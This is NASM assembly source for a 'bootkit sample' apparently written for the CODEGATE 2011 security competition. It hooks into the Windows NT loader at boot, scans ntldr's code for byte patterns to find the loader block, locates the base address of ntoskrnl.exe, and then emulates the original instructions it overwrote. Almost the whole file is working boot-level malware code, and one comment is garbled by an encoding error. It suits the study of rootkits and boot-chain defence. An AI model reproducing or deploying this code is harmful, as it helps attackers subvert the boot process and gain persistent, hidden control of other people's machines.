;==============================================================================
; bootkit sample for for CODEGATE 2011 
;
;==============================================================================
; Author    somma (somma@fsksec.co.kr)
;           http://somma.egloos.com
;==============================================================================
; All rights reserved by FSK Security Co.Ltd.
;==============================================================================

BITS 32

; generate a map file
;
[map symbols ntpayload.map]

CODE32_ADDR			equ			0x0009EE00				; must fix ! .. -_-;;
NTBASE_ADDR			equ			0x804d9000				; must fix !  ~


CODE32START:	; 0x9ee00
	; CS=0x0008, DS=0x0010, ES=0x0010, FS=0x0030 GS=0x0000, SS=0x0010
	; 
	;
	pushfd
	pushad
	

	cld
	mov		edi, [esp + 0x24]		; get return eip (get caller's module address)
	and		edi, ~0x000FFFFF		; get ntldr module base address
	
	mov		al,	0xC7				; C7 46 34 00 40 00 00    MOV DWORD PTR [ESI+34h], 4000h									
	scan_c7:
		scasb
		jnz		short scan_c7

		cmp		dword [edi], 0x40003446
		jnz		short scan_c7

		mov		al, 0xA1			; A1 xx xx xx xx          MOV EAX, [xxxxxxxx]
									; xxxxxxxx = _BlLoaderBlock --> module list's base pointer!
	scan_A1:
		scasb
		jnz		short scan_A1

        mov		esi, [edi]		; http://www.msuiche.net/papers/Windows_Vista_64bits_and_unexported_kernel_symbols.pdf
	    mov		esi, [esi]		; points to base of loader table
	    mov		esi, [esi]		; points to first entry it's Ntoskrnl.exe
	    mov		ebx, [esi+24]	; to obtain pointer to ntoskrnls, base address,it 24 bytes from it's entry

		;
		; We got ntoskrnl.exe !!!!
		; 
		;  ebx  ִ  ö~~~ ¥~
		
	; restore registers and simulate original code and return
	;
	; original code
	; seg000:26C3C 8B F0                                   mov     si, ax
	; seg000:26C3E 85 F6                                   test    si, si
	; seg000:26C40 74 21                                   jz      short loc_6C63
	popad
	popfd

	mov		esi, eax
	test	eax, eax
	jnz		short Patch_done_nojz

	pushfd	
	add		dword [esp+4], 21h
	popfd
Patch_done_nojz:
	ret

